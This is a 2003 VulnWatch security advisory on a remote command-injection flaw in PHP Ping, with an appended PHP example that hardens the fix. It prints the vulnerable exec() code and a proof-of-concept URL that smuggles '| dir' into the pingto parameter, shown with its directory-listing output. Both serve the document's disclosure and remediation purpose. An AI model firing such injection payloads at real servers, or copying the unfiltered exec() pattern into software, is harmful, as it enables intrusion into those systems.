[VulnWatch] [SCSA-009] Remote Command Execution Vulnerability in PHP Ping

From: Gregory Le Bras | Security Corporation (gregory.lebras@security-corp.org)
Date: 03/06/03

    From: "Gregory Le Bras | Security Corporation" <gregory.lebras@security-corp.org>
    To: <vulnwatch@vulnwatch.org>
    Date: Thu, 6 Mar 2003 12:57:26 +0100
    
    

    ________________________________________________________________________

    Security Corporation Security Advisory [SCSA-009]
    ________________________________________________________________________

    PROGRAM: PHP Ping
    HOMEPAGE: http://www.phpapps.org/
    VULNERABLE VERSIONS: v0.1 and prior
    ________________________________________________________________________

    DESCRIPTION
    ________________________________________________________________________

    PHP ping "will allow you, provided that your server turns under Windows,
    to realize a "ping" on the host of your choice."

    (direct quote from PHP Ping website)

    DETAILS
    ________________________________________________________________________

    A vulnerability has been found in PHP Ping which allows attackers to
    execute commands remotely.

    This vulnerability would allow a remote attacker to compromise parts of
    the operating system, possibly the complete operating system.

    Vulnerable code :

    <?php
    //*************************************
    // PING FUNCTION
    //*************************************
    function PHPing($cible,$pingFile){
        // $cible is interpolated into the shell command unfiltered, so
        // shell metacharacters such as | are interpreted by the shell.
        $ping = "";
        exec("ping -a -n 1 $cible >$pingFile", $list);
        $fd = fopen($pingFile, "r");
        while(!feof($fd))
        {
            $ping.= fgets($fd,256);
        }
        fclose($fd);
        return $ping;
    }
    //-------------------------------------
    ?>

    EXPLOIT
    ________________________________________________________________________

    The vulnerability was discovered in the page that executes "ping",
    at this address:

    http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir

    This exploit simply shows the contents of the current directory.

    c:\phpping

    03/03/2003 23:01 <DIR> .
    03/03/2003 23:01 <DIR> ..
    03/03/2003 23:00 <DIR> img
    30/04/2002 23:13 3217 index.php
    30/04/2002 23:19 921 README
    03/03/2003 23:03 0 resultat.ping
                   3 file(s) 4138 bytes
                   3 Dir(s) 11413962752 bytes free

    SOLUTIONS
    ________________________________________________________________________

    For example, use this code:

    <?php
    //*************************************
    // PING FUNCTION
    //*************************************
    function PHPing($cible,$pingFile){

        # BugFix by Gregory LEBRAS www.security-corp.org

        // Allowlist check on the target before it reaches the shell.
        // The D modifier stops "$" from matching before a trailing newline.
        if( (!$cible) ||
            (!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/iD",$cible)) ){
            echo("Error: Please specify a valid target host or IP.");
            exit;
        }
        else
        {
            $ping = "";
            exec("ping -a -n 1 $cible >$pingFile", $list);
            $fd = fopen($pingFile, "r");
            while(!feof($fd))
            {
                $ping.= fgets($fd,256);
            }
            fclose($fd);
            return $ping;
        }
    }
    //------------------------------------
    ?>

    VENDOR STATUS
    ________________________________________________________________________

    The vendor has reportedly been notified.

    LINKS
    ________________________________________________________________________

    French version:

    http://www.security-corp.org/advisories/SCSA-009-FR.txt

    ------------------------------------------------------------
    Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
    ------------------------------------------------------------
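
An added example (not part of the advisory or of PHP Ping): a variant of the fix in SOLUTIONS that anchors the pattern on the whole string, quotes the argument with escapeshellarg(), and reads ping's output from exec() instead of a result file. The function names are hypothetical and the sample targets are constructed; the loop at the end only builds the command lines and does not run ping.

```php
<?php
// Added example, not PHP Ping's code; function names are hypothetical.

// Accept only an IPv4 address or a dotted hostname of letters, digits and
// hyphens. \A and \z anchor the whole string, so a trailing newline fails.
function is_valid_ping_target($cible): bool
{
    if (!is_string($cible) || $cible === '' || strlen($cible) > 253) {
        return false;
    }
    if (filter_var($cible, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return true;
    }
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return preg_match('/\A' . $label . '(?:\.' . $label . ')+\z/i', $cible) === 1;
}

// Build the command line, or return null if the target is rejected.
// escapeshellarg() is a second layer: the target always reaches the
// shell as a single quoted argument.
function build_ping_command($cible): ?string
{
    if (!is_valid_ping_target($cible)) {
        return null;
    }
    return 'ping -a -n 1 ' . escapeshellarg($cible);
}

// Run the ping and return its output. exec() fills $lines itself, so no
// redirect to a result file is needed.
function safe_phping($cible): ?string
{
    $cmd = build_ping_command($cible);
    if ($cmd === null) {
        return null;
    }
    exec($cmd, $lines);
    return implode("\n", $lines);
}

// Constructed inputs: two legitimate targets, the advisory's payload,
// and a hostname with a trailing newline.
$samples = ['www.security-corp.org', '192.0.2.10',
            'www.security-corp.org | dir', "www.security-corp.org\n"];
foreach ($samples as $s) {
    $cmd = build_ping_command($s);
    echo json_encode($s), ' => ', $cmd === null ? 'REJECTED' : $cmd, "\n";
}
```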

